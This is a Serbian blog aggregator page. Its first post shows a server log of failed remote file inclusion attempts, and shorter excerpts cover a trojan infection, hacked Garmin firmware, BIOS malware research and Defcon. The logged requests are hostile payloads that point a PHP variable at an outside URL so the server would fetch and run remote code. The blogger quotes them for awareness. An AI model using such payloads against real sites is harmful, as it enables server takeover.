Planeta Srbija

Danas sam u logu primetio pokušaje napada na blog. Napadi su suviše naivni i neuspeli ali će možda nekome biti interesantno da vidi. Evo loga jedno napada sa adrese: 195.146.81.144 (host2.relline.ru)

/redirekcija-putanja-url-rewriti...avan-nacin/comment-page-1%20%20 ///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt???? ///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt???? /redirekcija-putanja-url-rewriti...avan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt???? _SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt???? /redirekcija-putanja-url-rewriting-na-jednostavan-nacin///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt???? ///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt???? /redirekcija-putanja-url-rewriting-na-jednostavan-nacin/comment-page-1///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt???? /redirekcija-putanja-url-rewriting-na-jednostavan-nacin?_SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt???? _SERVERDOCUMENT_ROOT=http://www.yeshouse.net/column/x.txt???? ///?_SERVER[DOCUMENT_ROOT]=http://www.yeshouse.net/column/x.txt????

Zar se ovaj stvarno nadao da će ovako nešto da prođe? Jedno tri-čeitiri godine ranije bi možda imao neku šansu da nabasa na kakav sajt koji je toliko bušan da ovaj napad uspe.

Bilo bi zanimljivo imati neki dodatak koji bi prepoznavao ovakve pokušaje pa ubijao konekcije koliko da se ne troši protok bezveze.

Slični članci na blogu:StopCommentSpamJoš jedan tekst neovlašćeno preuzet […]

Došao je i taj dan da mene smlati trojanac. Ošašavio me je ko mladog majmuna i još uvek ne znam šta se dogodilo.

Sinoć su počeli ljudi da mi prijavljuju za par sajtova da im Firefox prijavljuje da su opasni i ne dozvoljava pristup. Nisam se iznenadio, jer sam nedelju dana ranije već otkrio trojanca koji je napao četiri sajta koje […]

Danas sam imao peh. U prodavnici, dok sam se provlačio između uskih polica, zakačim torbom laptopa za jednu od njih i ona mi slete sa ramena. Nije pala sa velike visine, pa se nisam zabrinuo, ali kada sam došao kući pao sam u očaj - Windows nije mogao da se podigne - ili se zakucavao ili je restartovao računar.

Na računaru […]

U članku I jeftini garmin nüvi GPS-ovi imaju opciju snimanja pređenog puta (track log) samo je sakrivena sam opisao kako se pokreće ova opcija na nekim uređajima, jer postoji samo je sakrivena. Nažalost, to se može upotrebiti samo na nekim uređajima i to na pojedinim verzijama firmvera u njima.

Nedavno su se pak pojavili hakovani firmveri za nüvi uređaje koji uključuju opciju beleženja puta. Ispravka je vrlo jednostavna i bezbolna - umesto da u uređaj učitate zvanični firmver, učitate doterani i opcija logovanja je dostupna.

S obzirom da se radi o ažuriranju firmvera treba biti oprezan. Učitate li pogrešan firmver u uređaj to može da se završi loše. Vrlo je važno da saznate tačnu verziju harvera u uređaju (HWID) i učitate firmver koji…

Kada sam probao GPS prvi nüvi 200, veliko razočarenje  je bilo to da uređaj uopšte nema snimanje pređenog puta. Do tada sam koristio ručne GPS-ove koji su imali tušta i tma opcija, a snimanje pređenog puta je opcija bez koje se GPS uređaj može smatrati skoro pa neupotrebljivim.

Garmin je ne jednom pokazao svoju čudnu poslovnu politiku koja je verovatno kulminirala na nüvi seriji. Naime, oni prave uređaje u raznim cenovnim klasama, ali su oni hardverski vrlo često skoro pa istovetni, a razlikuju se samo po omogućenim programskim opcijama. Kada pogledate lepezu garmin nüvi uređaja lako je izgubiti se u raznolikim oznakama iza kojih se često kriju funkcionalno potpuno identični uređaji.

Tako je garmin jeftine nüvi uređaje opredelio ka korisnicima malih prohteva…

Na ovogodišnjem CanSecWes, konferenciji posvećenoj primenjenoj digitalnoj sigurnosti, predstavljena je tehnologija zaražavanja računara zlonamernim programom koji se smešta u sam BIOS računara.

Anibal Sako (Anibal Sacco) i Alfredo Ortega (Alfredo Ortega) istraživači Core Security Technologies pokazali su da mogu da u BIOS instaliraju program kojiim daje potpunu kontrolu računara. Njihov metod je nezavisan od operativnog sistema jer ne koristi njihovu ranjivost.

Već ranije je Xon Hesman (John Heasman), direktor istraživanja u NGS Software, pokazao tehniku zaražavanja računara korišćenjem interne memorije PCI kartica u računaru, što omogućava da virus “preživi” čak i formatiranje hard diska.

Ovo je veliki pomak. Do sada su zlonamerni programi pravljeni tako da napadaju specifične operativne sisteme, što je i iznelo Vonudouz na loš glas kao najranjiviji, mada je on…

Zatrebale su mi baterije, one male dugmaste, za ručne satove, pa svratim u jednu radnju i kada sam pitao oni mi traže da im kažem oznaku baterija. Ma kakva oznaka, one male dugmaste, standardne…

Eee, nema više standardnih, izvadi mi cura punu puncatu fioku dugmastih baterija, sve male i sve različite.U moje vrme psotojale su samo tri vrste dugmastih baterija i nikako nisi mogao da pogrešiš, a gle sad, prave ih svih mogućih veličina kao da se ne valja da svi koriste iste. Preturah ja to malo u nadi da ću “prepoznati” onu koja mi treba ali slaba vajda.

Odustadoh.

Onda krajičkom oka opazih na polici bateriju od 12 V, ali naročitu, izgleda kao obične AAA baterije od 1.5 V, iste debljine samo…

Ovogodišnji Defcon je bio više nego zanimljiv. Snimci prezentacija se mogu naći na Google Video sajtu, a sakupljeni su ovde. Ima više od 200 videoa!